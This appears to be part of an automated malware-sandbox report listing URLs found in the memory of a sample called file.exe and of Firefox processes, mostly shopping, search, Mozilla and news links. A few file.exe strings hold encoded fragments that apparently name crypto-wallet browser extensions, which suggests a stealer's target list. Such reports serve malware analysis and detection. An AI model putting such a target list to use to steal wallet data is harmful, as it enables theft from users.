Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211896336.0000016DEA822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.befr.ebay.be/sch/
Source: file.exe, 00000000.00000002.2461529806.0000000028D7C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.businessinsider.com/openai-searchgpt-search-engine-prototype-declares-war-with-google-20
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bustle.com/entertainment/how-to-watch-simone-biles-gymnastics-2024-paris-olympics?utm_so
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.context.news/socioeconomic-inclusion/olympic-refugee-team-leader-hopes-for-first-medal?u
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dwell.com/article/paris-2024-summer-olympic-games-village-002bb1a9?utm_source=pocket-new
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202842273.0000016DEA8B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211240177.0000016DEA8B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.at/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202842273.0000016DEA8B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211240177.0000016DEA8B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.at/sch/
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE66CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.ca/
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE66CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.ca/sch/
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE66CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.ch/
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE66CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.ch/sch/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.co.uk/sch/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202842273.0000016DEA8B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211240177.0000016DEA8B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.com.au/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202842273.0000016DEA8B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211240177.0000016DEA8B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.com.au/sch/
Source: firefox.exe, 00000021.00000003.3204250209.0000016DE9EB1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211240177.0000016DEA873000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202842273.0000016DEA873000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.com/
Source: firefox.exe, 00000021.00000003.3204250209.0000016DE9EB1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211240177.0000016DEA873000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202842273.0000016DEA873000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.com/sch/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4BC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.de/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4BC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.de/sch/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211896336.0000016DEA822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.es/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211896336.0000016DEA822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.es/sch/
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE66CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.fr/
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE66CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.fr/sch/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE495F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.ie/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE495F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.ie/sch/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4BC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.it/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4BC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.it/sch/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.nl/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.nl/sch/
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 00000021.00000003.3128000136.0000016DDE287000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3204250209.0000016DE9EB1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221635085.0000016DE6BF9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3156750421.0000016DEA318000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3128160260.0000016DDE27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4B2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3163108384.0000016DE4B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.fastcompany.com/91161368/experts-say-the-gender-pay-gap-may-never-go-away?utm_source=poc
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: firefox.exe, 00000021.00000003.3221850152.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000021.00000003.2958312592.0000016DDF977000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2953642125.0000016DDF973000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000021.00000003.2813756993.0000016DDD36B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2811196569.0000016DDD350000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809919292.0000016DDD336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809382625.0000016DDD100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2814195790.0000016DDD383000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 00000021.00000003.3215505857.0000016DE4B6A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3165602215.0000016DEA9EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3166260392.0000016DEA9DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000021.00000003.2987016191.0000016DDF1FC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2986300787.0000016DDF2C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chat_load.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/load.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/open.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: firefox.exe, 00000021.00000003.3203736370.0000016DEA336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/
Source: firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/1
Source: firefox.exe, 00000021.00000003.3217482927.0000016DE077C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211896336.0000016DEA82F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.5_pF0xwhc8s.es5.O
Source: firefox.exe, 00000021.00000003.3202373857.0000016DECCDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210911621.0000016DEA8D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/feedback/js/ghelp/;
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/feedback/js/ghelp/;report-uri
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/inproduct_help/
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/inproduct_help/api/main.min.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/inproduct_help/chatsupport/chatsupport_button_v2.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/inproduct_help/service/lazy.min.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/support/content/
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/uservoice/feedback/client/web/live/main_light_binary.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/uservoice/surveys/resources/prod/js/survey/
Source: firefox.exe, 00000021.00000003.3212471692.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158551690.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hotels.com/?locale=en_US&pos=HCOM_US&siteid=300000001&rffrid=sem.hcom.US.AMP.003.00.03.s
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.jezebel.com/have-the-olympic-beds-always-been-this-bad?utm_source=pocket-newtab-en-us
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.latimes.com/sports/olympics/story/2024-07-23/simone-biles-yurchenko-double-pick-paris?ut
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3128258779.0000016DDE270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.motherjones.com/politics/2024/07/joe-biden-climate-legacy-donald-trump-kamala-harris/?ut
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.motherjones.com/wp-content/uploads/2024/07/202407-24-biden-harris.jpg?w=1200&h=630&crop=
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158551690.0000016DE9763000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158551690.0000016DE977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212719724.0000016DE977C000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmp, firefox.exe, 00000021.00000003.3165123543.0000016DDEA80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: firefox.exe, 00000021.00000003.3128000136.0000016DDE287000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3126198363.0000016DE68B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3125801220.0000016DEA264000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3121392395.0000016DE68C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3122392806.0000016DE68AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3124555602.0000016DE68D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3124692516.0000016DE68AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: file.exe, 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmp, firefox.exe, 00000021.00000003.3165123543.0000016DDEA80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: firefox.exe, 00000021.00000003.3204250209.0000016DE9EEC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158429296.0000016DE9EE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212266661.0000016DE9EEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/firefox/127.0/releasenotes/
Source: firefox.exe, 00000021.00000003.3221424465.0000016DE9747000.00000004.00000800.00020000.00000000.sdmp, targeting.snapshot.json.tmp.33.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/0x1024
Source: file.exe, 00000000.00000003.2190665391.000000002EF4A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000021.00000003.3165123543.0000016DDEA80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
Source: firefox.exe, 00000021.00000003.3165123543.0000016DDEA80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
Source: file.exe, 00000000.00000003.2190665391.000000002EF4A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B015CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2190665391.000000002EF4A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/kZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGp
Source: file.exe, 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/vRm9ybXxwbmxjY21vamNtZW9obHBnZ21mbmJiaWFwa21ibGlvYnwxfDB8MHx
Source: firefox.exe, 00000021.00000003.2872801163.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2984375808.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nationalgeographic.com/animals/article/cocaine-sharks-brazil-pollution-contaminated-wate
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.outsideonline.com/food/food-culture/what-is-american-wagyu/?utm_source=pocket-newtab-en-
Source: firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.outsideonline.com/outdoor-adventure/olympics/salt-lake-city-hosts-2034-winter-olympics/?
Source: firefox.exe, 00000021.00000003.3216319694.0000016DE4B24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4B2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.romper.com/life/i-quit-cooking-family-mealtime-weeknight?utm_source=pocket-newtab-en-us
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.runnersworld.com/gear/a60891571/can-your-garmin-watch-replace-a-coach/?utm_source=pocket
Source: firefox.exe, 00000021.00000003.3163179964.0000016DE4B24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216319694.0000016DE4B24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sling.com/
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.themarshallproject.org/2024/07/25/police-mental-health-alternative-911?utm_source=pocket
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.thetakeout.com/1622553/ice-cube-secret-ingredient-grilled-cheese/?utm_source=pocket-newt
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.thetakeout.com/img/gallery/hear-us-out-ice-cubes-are-the-secret-to-amping-up-grilled-che
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.wired.com/story/amoc-collapse-atlantic-ocean/?utm_source=pocket-newtab-en-us
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: firefox.exe, 00000021.00000003.3164533070.0000016DDEAF8000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr	String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 00000021.00000003.3216319694.0000016DE4B24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4B2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B01503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
